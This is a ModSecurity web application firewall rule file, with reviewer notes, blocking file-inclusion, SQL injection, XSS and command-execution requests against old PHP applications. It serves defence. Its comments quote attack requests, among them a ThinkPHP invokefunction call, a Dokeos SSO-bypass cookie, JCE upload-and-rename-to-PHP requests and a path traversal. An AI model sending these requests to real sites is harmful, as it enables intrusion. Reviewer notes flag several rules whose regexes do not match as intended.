# a chained remote-scheme test on the vulnerable parameter. The chained rules
# carry no transformations (see 390760 above) and the REQUEST_URI-based ones
# see the query string as the engine delivers it (undecoded), so a
# percent-encoded scheme is not matched by them.
# Rule 310054: b2 cafelog gm-2-b2.php remote file include attempt
SecRule REQUEST_FILENAME "/gm-2-b2\.php" "phase:2,id:310054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2 cafelog gm-2-b2.php remote file include attempt',chain"
    SecRule REQUEST_URI "b2inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310055: BLNews objects.inc.php4 remote file include attempt
SecRule REQUEST_FILENAME "/objects\.inc\.php" "phase:2,id:310055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BLNews objects.inc.php4 remote file include attempt',chain"
    SecRule REQUEST_URI "server\[path\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310056: ttCMS header.php remote file include attempt
SecRule REQUEST_FILENAME "/admin/templates/header.php" "phase:2,chain,id:310056,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttCMS header.php remote file include attempt'"
    SecRule REQUEST_URI "admin_root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310059: pmachine remote file include attempt
SecRule REQUEST_URI "lib\.inc\.php" "phase:2,id:310059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pmachine remote file include attempt',chain"
    SecRule ARGS:pm_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310090:/forum/viewtopic.php?x=http://
SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,chain,id:310090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum remote include attempt'"
    SecRule ARGS:x "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310227:/auth.php?path=http://[attacker]/
# NOTE(review): the file-name pattern is "/authphp" (no "\." before php), so
# it does not match the /auth.php named in this comment and in the msg --
# almost certainly a typo for "/auth\.php"; confirm and fix.
SecRule REQUEST_FILENAME "/authphp" "phase:2,chain,id:310227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.php remote file inclusion attempt'"
    SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310233: PHP Form Mail Script File Inclusion vuln
SecRule REQUEST_FILENAME "/inc/formmail\.inc\.php" "phase:2,chain,id:310233,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP formmail.inc.php file inclusion attempt'"
    SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310234: download Center Lite command execution vuln
SecRule REQUEST_FILENAME "/inc/download_center_lite\.inc\.php" "phase:2,chain,id:310234,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: download Center Lite download_center_lite.inc.php command execution attempt'"
    SecRule ARGS:script_root "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310235: /modules/mod_mainmenu.php?mosConfig_absolute_path=http://
SecRule REQUEST_FILENAME "/modules/mod_mainmenu\.php" "phase:2,chain,id:310235,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mod_mainmenu.php command execution attempt'"
    SecRule ARGS:mosConfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310236: phpWebLog command execution
SecRule REQUEST_FILENAME "/init\.inc\.php" "phase:2,chain,id:310236,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php command execution attempt'"
    SecRule ARGS:G_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310238: mcNews command execution
SecRule REQUEST_FILENAME "/admin/header\.php" "phase:2,chain,id:310238,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews header.php command execution attempt'"
    SecRule ARGS:skinfile "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310240: votebox
SecRule REQUEST_URI "/votebox\.php\?voteboxpath=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310240,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: votebox.php command execution attempt'"
# Rules 310267 / 310293 / 310295 / 310297 / 390282 specify neither a phase
# nor a disruptive action of their own; both come from SecDefaultAction.
# Rule 310267: Remote File Inclusion Vulnerability in phpWebLog
SecRule REQUEST_URI "/include/init\.inc\.php\?G_path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog init.inc.php remote file inclusion attempt'"
# Rule 310293: PHPOpenChat
SecRule ARGS:poc_root_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: poc_root_path remote file inclusion attempt'"
# Rule 310295: PHPOpenChat
SecRule REQUEST_URI "/poc\.php\?sourcedir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPOpenChat poc.php remote file inclusion attempt'"
# Rule 310297: mcNews Remote command execution
SecRule REQUEST_URI "/admin/install\.php\?l=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310297,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews install.php remote command execution attempt'"
# 390282: page_tail.php includePath.
# NOTE(review): the "^test" alternative denies any includePath value that
# simply starts with "test" (looks like a proof-of-concept signature); verify
# it is still wanted.
SecRule REQUEST_FILENAME "/page_tail\.php" "chain,id:390282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page_tail RFI injection Vulnerability'"
    SecRule ARGS:includePath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|^test)"
##############index.php bypass################################
# Nested guard inside the RFI section: 333867 lets index.php requests through
# to the rules below; for any other file name 309002 jumps straight to
# END_PHP_JITP_INJECTION_RULES (the same marker the outer gate uses), so the
# rest of this section applies to index.php only.
SecRule REQUEST_FILENAME "index\.php" "id:333867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309002,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
# Rule 310237: phpWebLog command execution
SecRule REQUEST_FILENAME "/backend/addons/links/index\.php" "phase:2,chain,id:310237,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog backend index.php command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/"
# Rule 310268: Remote File Inclusion Vulnerability in phpWebLog
SecRule REQUEST_URI "addons/links/index\.php\?path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310268,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog links/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310289: PHP-Nuke remote file include attempt
# NOTE(review): the "*" characters here are regex quantifiers on the
# preceding character, not glob wildcards: "php*file=*" means "ph", zero or
# more "p", then "file" immediately, then zero or more "=". A real
# "/index.php?file=http://..." therefore never matches. The intended form is
# probably "/index\.php\?.*file=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/".
SecRule REQUEST_URI "/index\.php*file=*(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
#390651
#Joomla! Shoutbox Pro Component "controller" Local File Inclusion Vulnerability
# 390651: remote scheme, "../" or an absolute system path in "controller".
SecRule ARGS:controller "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))" "phase:2,id:390651,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! Shoutbox Pro Component controller Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310274: Multiple Vulnerabilities in auraCMS
# NOTE(review): because of the "*" after the tag-name group, "\<(...)*\>"
# also matches a bare "<>" in the query argument.
SecRule ARGS:query "(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:310274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310337: Vortex Portal Remote File Inclusion and Path Disclosure
# Vulnerabilities
# NOTE(review): the msg names "Dream4 Koobi CMS" while this comment names
# Vortex Portal -- one of the two is stale.
SecRule ARGS:act "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310392:AlstraSoft EPay Pro Remote File Include Vulnerability
SecRule REQUEST_URI "/epal/index\.php\?view=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019:honeypot catch
# (rule id 310580)
SecRule REQUEST_URI "/index\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310580,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Page argument RFI injection attempt'"
# Rule 310019: honeypot
SecMarker END_PHP_JITP_INJECTION_RULES

#/apps/files/ajax/scan.php?force=true&dir=&requesttoken=
# 331323: ownCloud files scan endpoint.
# NOTE(review): the example request carries "force=true" but the chained rule
# tests ARGS:scan -- verify which parameter the endpoint actually reads, or
# the rule may never fire.
SecRule REQUEST_URI "/apps/files/ajax/scan\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331323,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential Owncloud information leakage attack blocked',logdata:'%{TX.0}'"
    SecRule ARGS:scan "true" "t:none,t:urlDecodeUni,t:lowercase"
##############index.php rules################################
# Section guard: only requests whose file name matches index\.php reach the
# rules up to END_INDEX_PHP_JITP.
# NOTE(review): unlike 333867 this gate has no t:lowercase, so "INDEX.PHP" on
# a case-insensitive file system would bypass the whole section.
SecRule REQUEST_FILENAME "index\.php" "id:333868,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309003,t:none,pass,nolog,noauditlog,skipAfter:END_INDEX_PHP_JITP"
#/index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP
# 393753: "invokefunction" in s= together with a call_* function name.
# NOTE(review): the msg labels this "LFI attack"; the example above is a
# ThinkPHP invokefunction (code execution) request, so the label is
# misleading in the audit log.
SecRule ARGS:s "invokefunction" "phase:2,deny,log,auditlog,id:393753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked',chain"
    SecRule ARGS:function "call_" "t:none,t:urlDecodeUni,t:lowercase"
# 393754: "tostring(" in credential / uid arguments.
SecRule ARGS:username|ARGS:password|ARGS:uid "tostring\(" "phase:2,deny,log,auditlog,id:393754,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP code injection attack blocked'"
#GET /install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.0
# 393752: install_demo_name pointing at config_update.php.
SecRule ARGS:install_demo_name "config_update\.php" "phase:2,deny,log,auditlog,id:393752,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked'"
# 390737: Joomla com_simpleimageupload -- an uploaded file whose name contains
# .php/.phtml/.pht. This one inspects FILES|FILES_NAMES (the multipart upload
# itself), unlike the uploadify rule 337471 which looks at form arguments.
SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:390737,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Image Upload - Arbitrary File Upload'"
    SecRule ARGS:option "com_simpleimageupload" "t:none,t:urlDecodeUni,t:lowercase,chain"
    SecRule ARGS:view "upload" "t:none,t:urlDecodeUni,t:lowercase,chain"
    SecRule ARGS:tmpl "component" "t:none,t:urlDecodeUni,t:lowercase,chain"
    SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)" "t:none,t:lowercase,t:urlDecodeUni"
#/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=
# 333458: Dokeos SSO bypass -- exact-string signature (t:none) for one
# specific sso_cookie value; any other encoding or payload is not covered.
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333458,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DOKEOS ce30 Authentication Bypass attack blocked'"
    SecRule ARGS:sso_cookie "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30" "t:none"
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
#upload-dir=/&upload-overwrite=0&upload-name=0day&action=upload
#upload-dir=/&upload-overwrite=1&action=upload
# 333358: JCE image manager with any upload* argument present (".*" matches
# every value, so the last link is a presence test on ARGS:/upload/).
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333358,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential JCE image manager attack',logdata:'%{TX.0}'"
    SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
    SecRule ARGS:file "imgmanager" "t:none,t:lowercase,chain"
    SecRule ARGS:/upload/ ".*" "t:none,t:lowercase"
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw
#/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
#json={"fn":"folderRename","args":["/0day.gif","0day.php"]}
# 333359: JCE folderRename JSON call whose arguments mention a script
# extension (php/pl/cgi).
SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333359,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JCE image attempt to rename image file to PHP attack',logdata:'%{TX.0}'"
    SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain"
    SecRule ARGS:plugin "imgmanager" "t:none,t:lowercase,chain"
    SecRule ARGS:json "folderrename.*:.*(?:p(?:hp|l)|cgi)" "t:none,t:lowercase"
#nonumbers plugin vuln
#index.php?nn_qp=1&url=h
# 391663: NoNumber quick-page proxy: nn_qp=1, a url argument starting with a
# remote scheme, and an argument whose *name* contains "curl".
# NOTE(review): the two chained rules have no t: list of their own (the
# unquoted "chain" is the whole action list of the second link), so they
# match the argument as the engine delivers it -- an upper-case "HTTP://" in
# url is not lowercased here.
SecRule ARGS:nn_qp "^1$" "phase:2,chain,id:391663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:url "^(?:ht|f)tps?:/" chain
    SecRule ARGS_NAMES "curl"
#probe
# 391664: probe form of the same request (a plain host/path URL and nothing
# else).
SecRule REQUEST_URI "/index\.php\?nn_qp=1&url=https?://[a-z0-9\.\-\_\/]+$" "phase:2,id:391664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability Probe',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# ibProArcade Module "user" SQL Injection Vulnerability
# 391662: SQL statement shape (verb ... FROM/INTO/TABLE ...) in the "user"
# argument. Note that "|" inside the [...] classes is a literal pipe, not an
# alternation -- harmless, but the classes are wider than they look.
SecRule ARGS:user "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "phase:2,id:391662,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Module user SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310251: citrusdb directory traversal
#adjust these to your system, you might need to upload
SecRule REQUEST_FILENAME "tools/index\.php" "phase:2,chain,id:310251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:load "\.\./"
# Rule 310252: citrusdb upload authorization bypass (CAN-2005-0409)
SecRule REQUEST_URI "citrusdb/tools/index\.php\?load=importcc\&submit=on" "phase:2,id:310252,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php upload authorization bypass attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310058: ttforum remote file include attempt
# Any "template=" in the query string of forum/index.php is denied -- broad;
# watch for false positives on forums that use a template parameter
# legitimately.
SecRule REQUEST_URI "forum/index\.php" "phase:2,id:310058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttforum remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "template="
# Rule 310066: IdeaBox notification.php file include
SecRule REQUEST_URI "/index\.php" "phase:2,id:310066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IdeaBox file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "(?:notification|cord)\.php"
# Rule 310335: Dream4 Koobi CMS Index.PHP SQL Injection Vulnerability
SecRule REQUEST_URI "/index\.php\?p=articles" "phase:2,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310335,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php SQL injection attempt'"
    SecRule ARGS:area "'"
# Rule 310346:exoops Input Validation Flaws SQL injection and XSS
# 310346 / 310372 / 310407 / 310425 deny on a single apostrophe in the named
# argument; legitimate values containing "'" are denied as well.
SecRule ARGS:viewcat "\'" "phase:2,id:310346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310347:exoops Input Validation Flaws SQL injection and XSS
# NOTE(review): the "+" in "9\x2c+9\x2c+9" are regex quantifiers (one or more
# commas), not literal plus signs.
SecRule REQUEST_URI "/modules/sections/index\.php\?op=viewarticle&artid=9\x2c+9\x2c+9" "phase:2,id:310347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops sections/index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310372:Lighthouse Development Squirrelcart SQL Injection Vulnerability
SecRule ARGS:crn "\'" "phase:2,id:310372,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Lighthouse Squirrelcart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310382:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/index\.php\?mod=(?:pages|category)&(?:idp|id_ctg)=\'" "phase:2,id:310382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310405: phpMyAdmin convcharset Parameter Cross Site Scripting
# NOTE(review): "(?:...)*\>" matches any ">" in convcharset because the tag
# group may repeat zero times.
SecRule REQUEST_URI "/phpmyadmin/index\.php" "phase:2,chain,id:310405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin index.php convcharset parameter cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:convcharset "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310407: cubecart SQL injection
SecRule ARGS:phpsessid "\'" "phase:2,id:310407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310425:phpbb plus
SecRule REQUEST_FILENAME "/index\.php" "phase:2,chain,id:310425,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB index.php SQL injection attempt'"
    SecRule ARGS:c|ARGS:mark "'" "t:none,t:urlDecodeUni"
# Rule 310445:squirrelcart SQL injection
SecRule REQUEST_URI "index\.php" "phase:2,id:310445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Squirrelcart index.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:crn "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+(?:from|into|table|database|index|view)"
# Rule 310466: eGroupWare index.php cats_app Variable SQL Injection
# In 310466 / 310467 "=*" is a regex quantifier (zero or more "="), so the
# SQL verb has to follow the parameter name directly.
SecRule REQUEST_URI "/index\.php\?menuaction=preferences\.uicategories\.index\&cats_app=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare index.php SQL injection attempt'"
# Rule 310467: eGroupWare tts/index.php filter Variable SQL Injection
SecRule REQUEST_URI "/tts/index\.php\?filter=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310467,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare tts/index.php SQL injection attempt'"
SecMarker END_INDEX_PHP_JITP
##############index.php rules################################
#
#53
#FreePHPBlogSoftware "phpincdir" File Inclusion Vulnerability
# 390652: remote scheme, "../" or an absolute system path in phpincdir.
SecRule REQUEST_URI "default_theme\.php" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - FreePHPBlogSoftware phpincdir File Inclusion Vulnerability'"
    SecRule ARGS:phpincdir "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))"
#OSSEC 404 stuff does this better
# 350023: request for a deliberately non-existent file name (recon).
SecRule REQUEST_URI "thisdoesnotexistahaha\.php" "phase:2,id:350023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Non-Existant File Google Recon attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 380005: phpBB Remote Code Execution Attempt
# NOTE(review): the msg reads "PHP session cookie attack" while this comment
# and the highlight-argument signature describe the phpBB viewtopic highlight
# issue -- the msg looks stale.
SecRule REQUEST_URI "viewtopic\.php\?" "phase:2,id:380005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:highlight "(\'|\%[a-f0-9]{4})(\.|\/|\\|\%[a-f0-9]{4}).+?(\'|\%[a-f0-9]{4})"
# Rule 310008: squirrel mail spell-check arbitrary command attempt
SecRule REQUEST_URI "/squirrelspell/modules/check_me\.mod\.php" "phase:2,id:310008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail spell-check arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "sqspell_app\["
# Rule 310009: squirrel mail theme arbitrary command attempt
SecRule REQUEST_URI "/left_main\.php" "phase:2,id:310009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail theme arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "cmdd="
# Rule 310010: directory.php arbitrary command attempt
# Any ";" anywhere in a directory.php URI is denied.
SecRule REQUEST_URI "/directory\.php\?" "phase:2,id:310010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directory.php arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "\;"
# Rule 310045: DNSTools administrator authentication bypass attempt
SecRule REQUEST_URI "/dnstools\.php" "phase:2,id:310045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DNSTools administrator authentication bypass attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "(?:user_dnstools_administrator|user_logged_in)=true"
# Rule 310049: Blahz-DNS dostuff.php modify user attempt
SecRule REQUEST_URI "/dostuff\.php\?action=modify_user" "phase:2,id:310049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Blahz-DNS dostuff.php modify user attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310050: PHP-Wiki cross site scripting attempt
# NOTE(review): glob-style "*" used as regex quantifiers ("\?*", "wiki*",
# "\<*", "(...)*"); the pattern only matches when the pieces are adjacent
# (e.g. "?name=wiki<script>") and not when other parameters sit in between --
# ".*" between the pieces was probably intended.
SecRule REQUEST_URI "/modules\.php\?*name=wiki*\<*(script|about|applet|activex|chrome)*\>" "phase:2,id:310050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Wiki cross site scripting attemptt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310053: shoutbox.php directory traversal attempt
SecRule REQUEST_URI "/shoutbox\.php" "phase:2,id:310053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shoutbox.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "\.\./"
# Rule 310057: autohtml.php directory traversal attempt
SecRule REQUEST_URI "/autohtml\.php" "phase:2,id:310057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: autohtml.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
